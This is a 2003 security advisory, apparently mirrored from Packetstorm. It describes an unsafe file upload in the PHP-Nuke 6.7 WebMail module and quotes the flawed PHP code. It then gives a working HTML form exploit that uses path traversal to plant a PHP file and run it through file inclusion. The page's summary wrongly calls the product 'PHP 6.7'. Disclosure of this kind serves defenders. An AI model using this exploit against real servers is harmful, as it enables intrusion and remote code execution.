Lucene search
K

php67.txt

🗓️ 06 Oct 2003 00:00:00Reported by Frog ManType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

PHP 6.7 allows unsafe file uploads, risking remote file inclusion on vulnerable servers.

Code
`Informations :  
°°°°°°°°°°°°°  
Language : PHP  
Version : 6.7  
Website : http://www.phpnuke.org  
Problem : File Upload  
  
  
PHP Code/Location :  
°°°°°°°°°°°°°°°°°°°  
modules/WebMail/mailattach.php :  
-------------------------------------------------------------------------------------------------------------------  
  
if (isset($userfile) AND $userfile != "none" AND !ereg("/", $userfile) AND   
!ereg("\.\.", $userfile) AND !ereg("%", $userfile)) {  
if (ini_get(file_uploads) AND $attachments == 1) {  
$updir = "tmp";  
@copy($userfile, "$updir/$userfile_name");  
@unlink($userfile);  
}  
}  
  
-------------------------------------------------------------------------------------------------------------------  
  
Exploit :  
°°°°°°°  
Anyone can choose the path, the name and the extention of a file to upload.   
Here the file is saved into http://[target]/modules/AvantGo/language/bad.php   
and can be included and executed with the URL   
http://[target]/modules.php?name=AvantGo&file=langague/bad :  
  
<form   
action="http://[target]/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/bad.php"   
method="POST" ENCTYPE="multipart/form-data">  
<input type="hidden" name="attachments" value="1">  
<input type="file" name="userfile"><br>  
<input type="submit" name="Send File>  
</form>  
  
  
It will work with Windows only because the temp name of the file is anything   
like this : c:\temp\php054.TMP so $userfile doesn't contain any '\'   
character.  
  
  
More details/Solution :  
°°°°°°°°°°°°°°°°°°°°  
A patch and more details can be found on http://www.phpsecure.info.  
  
  
frog-m@n  
  
_________________________________________________________________  
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Oct 2003 00:00Current
7.4High risk
Vulners AI Score7.4
21